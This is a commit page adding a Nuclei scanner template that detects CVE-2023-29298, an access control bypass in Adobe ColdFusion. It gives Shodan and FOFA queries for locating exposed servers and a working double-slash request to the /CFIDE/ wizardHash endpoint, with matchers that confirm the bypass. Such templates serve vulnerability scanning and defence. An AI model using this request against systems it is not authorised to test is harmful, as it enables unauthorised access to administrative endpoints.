Create CVE-2023-29298.yaml (#7677)
* Create CVE-2023-29298.yaml * fixed lint error * matcher + misc updates * strict matcher --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>patch-1
parent
f21048dccd
commit
a20611fe5d
|
@ -0,0 +1,41 @@
|
||||||
|
id: CVE-2023-29298
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adobe ColdFusion - Access Control Bypass
|
||||||
|
author: rootxharsh,iamnoooob,DhiyaneshDK,pdresearch
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.
|
||||||
|
reference:
|
||||||
|
- https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
|
||||||
|
- https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cwe-id: CWE-284
|
||||||
|
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: app="Adobe-ColdFusion"
|
||||||
|
shodan-query: http.component:"Adobe ColdFusion"
|
||||||
|
product: coldfusion
|
||||||
|
vendor: adobe
|
||||||
|
tags: cve,cve2023,adobe,auth-bypass,coldfusion
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- ([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- contains(content_type, "text/html")
|
||||||
|
- status_code == 200
|
||||||
|
- len(trim_space(body)) == 106
|
||||||
|
condition: and
|
Loading…
Reference in New Issue